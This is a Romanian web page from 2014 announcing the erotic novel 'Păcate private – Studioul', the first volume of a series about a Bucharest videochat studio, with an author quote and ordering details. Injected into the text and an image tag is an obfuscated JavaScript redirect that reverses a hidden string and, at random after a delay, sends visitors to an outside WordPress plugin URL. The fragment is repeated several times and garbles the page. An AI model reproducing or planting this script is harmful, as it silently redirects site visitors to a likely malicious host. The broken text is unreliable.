Published On: Wed, Oct 22nd, 2014

PĂCATE PRIVATE – Studioul – Primul volum din „Colecția Videochat”

com<script type=$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda pacate private - studioul" src="http://netpub.ro/wp-content/uploads/2014/10/comandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda-pacate-private-studioul.jpg" width="650" height="450" />              PĂCATE PRIVATE - Studioul este primul volum dintr-o lungă serie de romane erotice dezvoltate pe tema videochatului adult. Considerat un subiect tabu, videochatul naște o  curiozitate firească, iscând idei preconcepute, mistuite de prejudecăți și, nu în ultimul rând, stârnește adevărate intrigi! Acest prim volum se adresează deopotrivă tuturor cititorilor, fie că sunt mireni sau inițiați în lumea plăcerilor virtuale. Într-un fel sau altul, fiecare se va regăsi în paginile carții sau își va alege un personaj favorit, pe care să-l urmărească și în volumele următoare. PĂCATE PRIVATE este o serie de romane care își propune să dezvăluie câte ceva din tainele videochatului, așa cum s-a dezvoltat el, din zona neagră până spre zona gri, în care lucrurile încep oarecum să se normalizeze. Desigur,  drumul poveștii este lung, iar cititorii sunt invitați să pornească în această călătorie inițiatică, o adevărată aventură, alături de câteva modele ale unui studio din București, condus de un șef controversat. Pasiune, erotism, intrigi, conversații mai mult sau mai puțin indecente, întorsături de situație, picanterii extrase din discuțiile intime care au loc între modelele de videochat și membrii plătitori, acestea sunt doar câteva dintre ingredientele care construiesc povestea păcatelor private. O poveste captivantă așa cum probabil nu a mai fost scrisă până acum. Seria PĂCATE PRIVATE este o poveste fierbinte, presărată cu sex din belșug, în toate formele lui. Fizic, virtual, plăsmuit, dorit... Aceasta este, pe scurt, istoria Păcatelor Private, despre care autorul său, A. De Nimroede afirmă:

Nu mă aștept ca această carte să placă. Și nu spun asta pentru că, probabil, în România de azi, oamenii au uitat să citească. Știu că sunt acolo oameni care încă iubesc mirosul de carte, care încă iubesc să citească.

O spun pentru că Păcate private - Studioul este o carte „nesimțită”. Un afront la pudoare, poate, cum îl vor considera unii, o expunere a crudei realități, după părerea altora. Sau poate doar o realitate a zilelor noastre, transpusă într-o ficțiune epică presărată cu fragmente de sex explicit, real, virtual, pervers...

O carte care poate satisface curiozitățile laicilor care nu au nicio idee despre lumea videochatului, fără însă a generaliza. Probabil, cei din interiorul industriei se vor grăbi să judece actul literar ca pe o defavoare.

Departe de mine, abordarea aceasta. Cartea este doar o poveste fictivă a unui studio de videochat, cu bunele și relele din interiorul său. Evident, orice asemănare cu realitatea este doar o pură coincidență...”

Cartea poate fi comandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andată online pe site-ul www.privatecamstories.com la prețul de 37,90 Lei, preț care include toate taxele de livrare prin curier rapid. Primul volum este structurat pe zece capitole și are 260 de pagini, în format 13x20 cm. Împreună cu cartea veți primi cadou un VOUCHER surpriză în valoare de 25 de lei! Afis a2 PPSv2 micsorat